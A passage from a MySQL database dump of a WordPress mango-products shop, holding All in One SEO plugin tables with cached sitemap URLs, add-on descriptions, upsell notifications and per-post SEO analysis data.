4, 2022\";s:4:\"time\";s:8:\"12:18 pm\";}s:45:\"https://mangomitra.in/product/combo-pack-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:47 pm\";}s:46:\"https://mangomitra.in/product/combo-pack-10kg/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:7:\"4:56 pm\";}s:51:\"https://mangomitra.in/product/mango-solapur-pickle/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:58:\"https://mangomitra.in/product/mango-up-style-pickle-250gm/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:63:\"https://mangomitra.in/product/mango-hing-up-style-pickle-250gm/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:75:\"https://mangomitra.in/product/chhunda-or-gujarati-sweet-mango-pickle-250gm/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:53:\"https://mangomitra.in/product/mango-cut-pickle-500gm/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:49:\"https://mangomitra.in/product/mango-thokku-500gm/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:51:\"https://mangomitra.in/product/sweet-mango-pickle-2/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:40:\"https://mangomitra.in/product/testmango/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:7:\"3:35 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:50;s:5:\"total\";i:50;}}','2022-04-06 16:24:54','2022-02-12 15:57:25','2022-03-07 16:24:54'),(3848,'aioseo_sitemap_contest_submission-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:4:{s:59:\"https://mangomitra.in/contest/photo-contest/submission/905/\";a:2:{s:4:\"date\";s:16:\"February 9, 2022\";s:4:\"time\";s:7:\"1:45 pm\";}s:60:\"https://mangomitra.in/contest/photo-contest/submission/1010/\";a:2:{s:4:\"date\";s:17:\"February 25, 2022\";s:4:\"time\";s:7:\"9:35 am\";}s:60:\"https://mangomitra.in/contest/photo-contest/submission/1266/\";a:2:{s:4:\"date\";s:14:\"March 14, 2022\";s:4:\"time\";s:8:\"11:30 am\";}s:60:\"https://mangomitra.in/contest/photo-contest/submission/1268/\";a:2:{s:4:\"date\";s:14:\"March 14, 2022\";s:4:\"time\";s:8:\"11:34 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:4;s:5:\"total\";i:4;}}','2022-04-13 12:39:48','2022-02-12 15:57:28','2022-03-14 12:39:48'),(3849,'aioseo_sitemap_contest-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:2:{s:34:\"https://mangomitra.in/contest/787/\";a:2:{s:4:\"date\";s:16:\"February 9, 2022\";s:4:\"time\";s:7:\"1:09 pm\";}s:44:\"https://mangomitra.in/contest/photo-contest/\";a:2:{s:4:\"date\";s:17:\"February 25, 2022\";s:4:\"time\";s:7:\"4:16 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:2;s:5:\"total\";i:2;}}','2022-04-13 18:42:31','2022-02-12 15:57:34','2022-03-14 18:42:31'),(3850,'aioseo_sitemap_post-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:6:{s:45:\"https://mangomitra.in/2022/01/24/hello-world/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:8:\"12:49 pm\";}s:83:\"https://mangomitra.in/2020/06/04/products-are-hygienically-packed-safely-delivered/\";a:2:{s:4:\"date\";s:12:\"June 4, 2020\";s:4:\"time\";s:8:\"11:30 am\";}s:82:\"https://mangomitra.in/2020/06/04/get-more-offers-in-the-time-of-lockdown-covid-19/\";a:2:{s:4:\"date\";s:12:\"June 4, 2020\";s:4:\"time\";s:8:\"11:33 am\";}s:47:\"https://mangomitra.in/2020/07/03/hello-world-2/\";a:2:{s:4:\"date\";s:12:\"July 3, 2020\";s:4:\"time\";s:7:\"2:09 pm\";}s:51:\"https://mangomitra.in/2022/02/04/registartion-form/\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:8:\"12:53 pm\";}s:51:\"https://mangomitra.in/2022/02/04/give-away-contest/\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:7:\"4:01 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:6;s:5:\"total\";i:6;}}','2022-04-06 19:48:31','2022-02-12 15:57:36','2022-03-07 19:48:31'),(3851,'aioseo_sitemap_product_tag-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:1:{s:44:\"https://mangomitra.in/product-tag/pre-order/\";a:2:{s:4:\"date\";s:16:\"February 8, 2022\";s:4:\"time\";s:7:\"4:55 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:1;s:5:\"total\";i:1;}}','2022-03-14 15:57:47','2022-02-12 15:57:47','2022-02-12 15:57:47'),(3852,'aioseo_sitemap_e-landing-page-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:1:{s:24:\"https://mangomitra.in/a/\";a:2:{s:4:\"date\";s:16:\"January 31, 2022\";s:4:\"time\";s:7:\"5:42 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:1;s:5:\"total\";i:1;}}','2022-04-06 19:46:04','2022-02-12 15:59:02','2022-03-07 19:46:04'),(3853,'aioseo_sitemap_category-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:3:{s:45:\"https://mangomitra.in/category/uncategorized/\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:7:\"4:01 pm\";}s:36:\"https://mangomitra.in/category/food/\";a:2:{s:4:\"date\";s:12:\"June 4, 2020\";s:4:\"time\";s:8:\"11:30 am\";}s:37:\"https://mangomitra.in/category/offer/\";a:2:{s:4:\"date\";s:12:\"June 4, 2020\";s:4:\"time\";s:8:\"11:33 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:3;s:5:\"total\";i:3;}}','2022-04-06 19:46:31','2022-02-12 16:00:39','2022-03-07 19:46:31'),(3856,'addons','a:7:{i:0;O:8:\"stdClass\":14:{s:3:\"sku\";s:16:\"aioseo-image-seo\";s:4:\"name\";s:9:\"Image SEO\";s:7:\"version\";s:5:\"1.0.7\";s:5:\"image\";N;s:4:\"icon\";s:13:\"svg-image-seo\";s:6:\"levels\";a:5:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:4:\"plus\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:148:\"<p>Globally control the Title attribute and Alt text for images in your content. These attributes are essential for both accessibility and SEO.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:71:\"https://aioseo.com/docs/using-the-image-seo-features-in-all-in-one-seo/\";s:12:\"learnMoreUrl\";s:71:\"https://aioseo.com/docs/using-the-image-seo-features-in-all-in-one-seo/\";s:9:\"manageUrl\";s:44:\"https://route#aioseo-search-appearance:media\";}i:1;O:8:\"stdClass\":14:{s:3:\"sku\";s:20:\"aioseo-video-sitemap\";s:4:\"name\";s:13:\"Video Sitemap\";s:7:\"version\";s:5:\"1.1.1\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:5:{i:0;s:10:\"individual\";i:1;s:8:\"business\";i:2;s:6:\"agency\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:6:\"agency\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:243:\"<p>The Video Sitemap works in much the same way as the XML Sitemap module, it generates an XML Sitemap specifically for video content on your site. Search engines use this information to display rich snippet information in search results.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:54:\"https://aioseo.com/docs/how-to-create-a-video-sitemap/\";s:12:\"learnMoreUrl\";s:54:\"https://aioseo.com/docs/how-to-create-a-video-sitemap/\";s:9:\"manageUrl\";s:43:\"https://route#aioseo-sitemaps:video-sitemap\";}i:2;O:8:\"stdClass\":14:{s:3:\"sku\";s:21:\"aioseo-local-business\";s:4:\"name\";s:18:\"Local Business SEO\";s:7:\"version\";s:7:\"1.2.3.1\";s:5:\"image\";N;s:4:\"icon\";s:18:\"svg-local-business\";s:6:\"levels\";a:5:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:4:\"plus\";i:3;s:3:\"pro\";i:4;s:5:\"elite\";}s:13:\"currentLevels\";a:3:{i:0;s:4:\"plus\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:253:\"<p>Local Business schema markup enables you to tell Google about your business, including your business name, address and phone number, opening hours and price range. This information may be displayed as a Knowledge Graph card or business carousel.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:43:\"https://aioseo.com/docs/local-business-seo/\";s:12:\"learnMoreUrl\";s:43:\"https://aioseo.com/docs/local-business-seo/\";s:9:\"manageUrl\";s:40:\"https://route#aioseo-local-seo:locations\";}i:3;O:8:\"stdClass\":14:{s:3:\"sku\";s:19:\"aioseo-news-sitemap\";s:4:\"name\";s:12:\"News Sitemap\";s:7:\"version\";s:5:\"1.0.5\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:4:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:284:\"<p>Our Google News Sitemap lets you control which content you submit to Google News and only contains articles that were published in the last 48 hours. In order to submit a News Sitemap to Google, you must have added your site to Google’s Publisher Center and had it approved.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:60:\"https://aioseo.com/docs/how-to-create-a-google-news-sitemap/\";s:12:\"learnMoreUrl\";s:60:\"https://aioseo.com/docs/how-to-create-a-google-news-sitemap/\";s:9:\"manageUrl\";s:42:\"https://route#aioseo-sitemaps:news-sitemap\";}i:4;O:8:\"stdClass\":14:{s:3:\"sku\";s:16:\"aioseo-redirects\";s:4:\"name\";s:19:\"Redirection Manager\";s:7:\"version\";s:5:\"1.1.7\";s:5:\"image\";N;s:4:\"icon\";s:480:\"PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgY2xhc3M9ImFpb3Nlby1yZWRpcmVjdCI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGQ9Ik0xMC41OSA5LjE3TDUuNDEgNEw0IDUuNDFMOS4xNyAxMC41OEwxMC41OSA5LjE3Wk0xNC41IDRMMTYuNTQgNi4wNEw0IDE4LjU5TDUuNDEgMjBMMTcuOTYgNy40NkwyMCA5LjVWNEgxNC41Wk0xMy40MiAxNC44MkwxNC44MyAxMy40MUwxNy45NiAxNi41NEwyMCAxNC41VjIwSDE0LjVMMTYuNTUgMTcuOTVMMTMuNDIgMTQuODJaIiBmaWxsPSJjdXJyZW50Q29sb3IiIC8+PC9zdmc+\";s:6:\"levels\";a:4:{i:0;s:8:\"business\";i:1;s:6:\"agency\";i:2;s:3:\"pro\";i:3;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:101:\"<p>Our Redirection Manager allows you to create and manage redirects for 404s or modified posts.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:48:\"https://aioseo.com/features/redirection-manager/\";s:12:\"learnMoreUrl\";s:48:\"https://aioseo.com/features/redirection-manager/\";s:9:\"manageUrl\";s:30:\"https://route#aioseo-redirects\";}i:5;O:8:\"stdClass\":14:{s:3:\"sku\";s:21:\"aioseo-link-assistant\";s:4:\"name\";s:14:\"Link Assistant\";s:7:\"version\";s:5:\"1.0.2\";s:5:\"image\";N;s:4:\"icon\";s:516:\"PHN2ZyB2aWV3Qm94PSIwIDAgMjQgMjQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHBhdGggZmlsbC1ydWxlPSJldmVub2RkIiBjbGlwLXJ1bGU9ImV2ZW5vZGQiIGQ9Ik0xMSAxNUg3QzUuMzUgMTUgNCAxMy42NSA0IDEyQzQgMTAuMzUgNS4zNSA5IDcgOUgxMVY3SDdDNC4yNCA3IDIgOS4yNCAyIDEyQzIgMTQuNzYgNC4yNCAxNyA3IDE3SDExVjE1Wk0xNyA3SDEzVjlIMTdDMTguNjUgOSAyMCAxMC4zNSAyMCAxMkMyMCAxMy42NSAxOC42NSAxNSAxNyAxNUgxM1YxN0gxN0MxOS43NiAxNyAyMiAxNC43NiAyMiAxMkMyMiA5LjI0IDE5Ljc2IDcgMTcgN1pNMTYgMTFIOFYxM0gxNlYxMVoiIGZpbGw9ImN1cnJlbnRDb2xvciIvPjwvc3ZnPgo=\";s:6:\"levels\";a:3:{i:0;s:6:\"agency\";i:1;s:3:\"pro\";i:2;s:5:\"elite\";}s:13:\"currentLevels\";a:2:{i:0;s:3:\"pro\";i:1;s:5:\"elite\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:283:\"<p>Super-charge your SEO with Link Assistant! Get relevant suggestions for adding internal links to older content as well as finding any orphaned posts that have no internal links. Use our reporting feature to see all link suggestions or add them directly from any page or post.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:39:\"https://aioseo.com/docs/link-assistant/\";s:12:\"learnMoreUrl\";s:39:\"https://aioseo.com/docs/link-assistant/\";s:9:\"manageUrl\";s:35:\"https://route#aioseo-link-assistant\";}i:6;O:8:\"stdClass\":14:{s:3:\"sku\";s:16:\"aioseo-index-now\";s:4:\"name\";s:8:\"IndexNow\";s:7:\"version\";s:5:\"1.0.0\";s:5:\"image\";N;s:4:\"icon\";s:16:\"svg-sitemaps-pro\";s:6:\"levels\";a:6:{i:0;s:8:\"business\";i:1;s:5:\"elite\";i:2;s:3:\"pro\";i:3;s:5:\"basic\";i:4;s:4:\"plus\";i:5;s:6:\"agency\";}s:13:\"currentLevels\";a:4:{i:0;s:5:\"basic\";i:1;s:5:\"elite\";i:2;s:3:\"pro\";i:3;s:4:\"plus\";}s:15:\"requiresUpgrade\";b:1;s:11:\"description\";s:193:\"<p>Add IndexNow support to instantly notify search engines when your content has changed. This helps the search engines to prioritize the changes on your website and helps you rank faster.</p>\n\";s:18:\"descriptionVersion\";i:0;s:11:\"downloadUrl\";s:0:\"\";s:10:\"productUrl\";s:28:\"https://aioseo.com/index-now\";s:12:\"learnMoreUrl\";s:28:\"https://aioseo.com/index-now\";s:9:\"manageUrl\";s:45:\"https://route#aioseo-settings:webmaster-tools\";}}','2022-03-16 04:16:43','2022-02-14 04:18:48','2022-03-15 04:16:43'),(3858,'rss_feed','a:4:{i:0;a:4:{s:3:\"url\";s:208:\"https://aioseo.com/how-to-use-link-assistant-to-optimize-your-internal-linking-strategy/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-to-use-link-assistant-to-optimize-your-internal-linking-strategy\";s:5:\"title\";s:68:\"How to Use Link Assistant to Optimize Your Internal Linking Strategy\";s:4:\"date\";s:13:\"Mar 14th 2022\";s:7:\"content\";s:131:\"Want an easy way to optimize your internal linking strategy?\n\n\n\nThen say hello to Link Assistant.\n\n\n\nLink Assistant is a handy f...\";}i:1;a:4:{s:3:\"url\";s:120:\"https://aioseo.com/what-is-indexnow-for-seo/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=what-is-indexnow-for-seo\";s:5:\"title\";s:54:\"What is IndexNow for SEO (Explained in Plain English)?\";s:4:\"date\";s:13:\"Mar 10th 2022\";s:7:\"content\";s:131:\"What is IndexNow and what&#8217;s all the hype around this protocol?\n\n\n\nSearch engine optimization (SEO) is a multifaceted disci...\";}i:2;a:4:{s:3:\"url\";s:224:\"https://aioseo.com/ways-link-assistant-can-save-you-time-on-internal-and-external-link-building/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=ways-link-assistant-can-save-you-time-on-internal-and-external-link-building\";s:5:\"title\";s:65:\"6 Ways Link Assistant Can Save You Time On Internal Link Building\";s:4:\"date\";s:12:\"Mar 7th 2022\";s:7:\"content\";s:131:\"What&#8217;s all the hype about our Link Assistant feature?\n\n\n\nIt&#8217;s because links play a huge role in effective search eng...\";}i:3;a:4:{s:3:\"url\";s:196:\"https://aioseo.com/announcing-improved-site-redirects-and-modified-date-for-posts/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=announcing-improved-site-redirects-and-modified-date-for-posts\";s:5:\"title\";s:62:\"Announcing Improved Site Redirects and Modified Date for Posts\";s:4:\"date\";s:12:\"Mar 1st 2022\";s:7:\"content\";s:131:\"At AIOSEO, we strive to make SEO easier for our users. We believe SEO and website management should be easy for everyone.&nbsp;\n...\";}}','2022-03-15 16:16:48','2022-02-14 04:18:53','2022-03-15 04:16:48');
/*!40000 ALTER TABLE `wp_aioseo_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aioseo_notifications`
--

DROP TABLE IF EXISTS `wp_aioseo_notifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_aioseo_notifications` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(13) NOT NULL,
  `title` text NOT NULL,
  `content` longtext NOT NULL,
  `type` varchar(64) NOT NULL,
  `level` text NOT NULL,
  `notification_id` bigint(20) unsigned DEFAULT NULL,
  `notification_name` varchar(255) DEFAULT NULL,
  `start` datetime DEFAULT NULL,
  `end` datetime DEFAULT NULL,
  `button1_label` varchar(255) DEFAULT NULL,
  `button1_action` varchar(255) DEFAULT NULL,
  `button2_label` varchar(255) DEFAULT NULL,
  `button2_action` varchar(255) DEFAULT NULL,
  `dismissed` tinyint(1) NOT NULL DEFAULT 0,
  `new` tinyint(1) NOT NULL DEFAULT 1,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `ndx_aioseo_notifications_slug` (`slug`),
  KEY `ndx_aioseo_notifications_dates` (`start`,`end`),
  KEY `ndx_aioseo_notifications_type` (`type`),
  KEY `ndx_aioseo_notifications_dismissed` (`dismissed`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aioseo_notifications`
--

LOCK TABLES `wp_aioseo_notifications` WRITE;
/*!40000 ALTER TABLE `wp_aioseo_notifications` DISABLE KEYS */;
INSERT INTO `wp_aioseo_notifications` VALUES (1,'61ef8add53911','Advanced WooCommerce Support','We have detected you are running WooCommerce. Upgrade to AIOSEO Pro to unlock our advanced eCommerce SEO features, including SEO for Product Categories and more.','info','[\"all\"]',NULL,'woo-upsell','2022-01-25 05:30:05',NULL,'Upgrade to Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=woo-notification-upsell',NULL,NULL,0,0,'2022-01-25 05:30:05','2022-01-25 05:30:05'),(2,'620372855180d','? Introducing IndexNow and Page Builder Integrations','Check out the fantastic new features in AIOSEO 4.1.7! First, we have IndexNow, a feature that gets your new or updated content indexed faster on Bing and Yandex (with more search engines to follow).\r\n<br><br>\r\nWe’ve also integrated AIOSEO with 3 major page builders, namely Elementor, Divi and SeedProd. Now you can work on your SEO right from within your page builder.\r\n<br><br>\r\nGet AIOSEO Pro today and up your SEO game without breaking a sweat!','success','[\"4-x\",\"lite\"]',223,NULL,'2022-02-08 13:39:00',NULL,'Learn More','https://aioseo.com/introducing-indexnow-and-page-builder-integrations-in-aioseo-4-1-7/?utm_source=WordPress&utm_campaign=index-now-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=index-now-v4-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-02-09 07:51:33','2022-02-14 04:18:48'),(3,'62037285561a5','? Introducing Link Assistant + Our Stand-Alone Headline Analyzer','Check out the brand new features in AIOSEO 4.1.6! First, we have Link Assistant, a powerful tool to help you build effective internal links and audit external ones.\r\n<br><br>\r\nWe’ve also added a stand-alone Headline Analyzer to help you craft, and A/B test your headlines right from within WordPress.\r\n<br><br>\r\nUpdate to AIOSEO 4.1.6 today and up your SEO game without breaking a sweat!','success','[\"4-x\",\"lite\"]',203,NULL,'2022-02-08 13:39:00',NULL,'Learn More','https://aioseo.com/new-introducing-link-assistant-a-stand-alone-headline-analyzer-and-more-in-aioseo-4-1-6/?utm_source=WordPress&utm_campaign=link-assistant-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=link-assistant-v4-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-02-09 07:51:33','2022-02-14 04:18:48');
/*!40000 ALTER TABLE `wp_aioseo_notifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aioseo_posts`
--

DROP TABLE IF EXISTS `wp_aioseo_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_aioseo_posts` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL,
  `title` text DEFAULT NULL,
  `description` text DEFAULT NULL,
  `keywords` mediumtext DEFAULT NULL,
  `keyphrases` longtext DEFAULT NULL,
  `page_analysis` longtext DEFAULT NULL,
  `canonical_url` text DEFAULT NULL,
  `og_title` text DEFAULT NULL,
  `og_description` text DEFAULT NULL,
  `og_object_type` varchar(64) DEFAULT 'default',
  `og_image_type` varchar(64) DEFAULT 'default',
  `og_image_url` text DEFAULT NULL,
  `og_image_width` int(11) DEFAULT NULL,
  `og_image_height` int(11) DEFAULT NULL,
  `og_image_custom_url` text DEFAULT NULL,
  `og_image_custom_fields` text DEFAULT NULL,
  `og_video` varchar(255) DEFAULT NULL,
  `og_custom_url` text DEFAULT NULL,
  `og_article_section` text DEFAULT NULL,
  `og_article_tags` text DEFAULT NULL,
  `twitter_use_og` tinyint(1) DEFAULT 0,
  `twitter_card` varchar(64) DEFAULT 'default',
  `twitter_image_type` varchar(64) DEFAULT 'default',
  `twitter_image_url` text DEFAULT NULL,
  `twitter_image_custom_url` text DEFAULT NULL,
  `twitter_image_custom_fields` text DEFAULT NULL,
  `twitter_title` text DEFAULT NULL,
  `twitter_description` text DEFAULT NULL,
  `seo_score` int(11) NOT NULL DEFAULT 0,
  `schema_type` varchar(20) DEFAULT 'default',
  `schema_type_options` longtext DEFAULT NULL,
  `pillar_content` tinyint(1) DEFAULT NULL,
  `robots_default` tinyint(1) NOT NULL DEFAULT 1,
  `robots_noindex` tinyint(1) NOT NULL DEFAULT 0,
  `robots_noarchive` tinyint(1) NOT NULL DEFAULT 0,
  `robots_nosnippet` tinyint(1) NOT NULL DEFAULT 0,
  `robots_nofollow` tinyint(1) NOT NULL DEFAULT 0,
  `robots_noimageindex` tinyint(1) NOT NULL DEFAULT 0,
  `robots_noodp` tinyint(1) NOT NULL DEFAULT 0,
  `robots_notranslate` tinyint(1) NOT NULL DEFAULT 0,
  `robots_max_snippet` int(11) DEFAULT NULL,
  `robots_max_videopreview` int(11) DEFAULT NULL,
  `robots_max_imagepreview` varchar(20) DEFAULT 'large',
  `tabs` mediumtext DEFAULT NULL,
  `images` longtext DEFAULT NULL,
  `image_scan_date` datetime DEFAULT NULL,
  `priority` tinytext DEFAULT NULL,
  `frequency` tinytext DEFAULT NULL,
  `videos` longtext DEFAULT NULL,
  `video_thumbnail` text DEFAULT NULL,
  `video_scan_date` datetime DEFAULT NULL,
  `local_seo` longtext DEFAULT NULL,
  `limit_modified_date` tinyint(1) NOT NULL DEFAULT 0,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `ndx_aioseo_posts_post_id` (`post_id`)
) ENGINE=InnoDB AUTO_INCREMENT=87 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aioseo_posts`
--

LOCK TABLES `wp_aioseo_posts` WRITE;
/*!40000 ALTER TABLE `wp_aioseo_posts` DISABLE KEYS */;
INSERT INTO `wp_aioseo_posts` VALUES (1,584,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-02-03 05:03:56',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-02-03 05:03:56'),(2,403,NULL,NULL,'[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'website','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-01-28 11:56:30','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-03-07 11:19:59'),(3,476,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:37:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-01-25 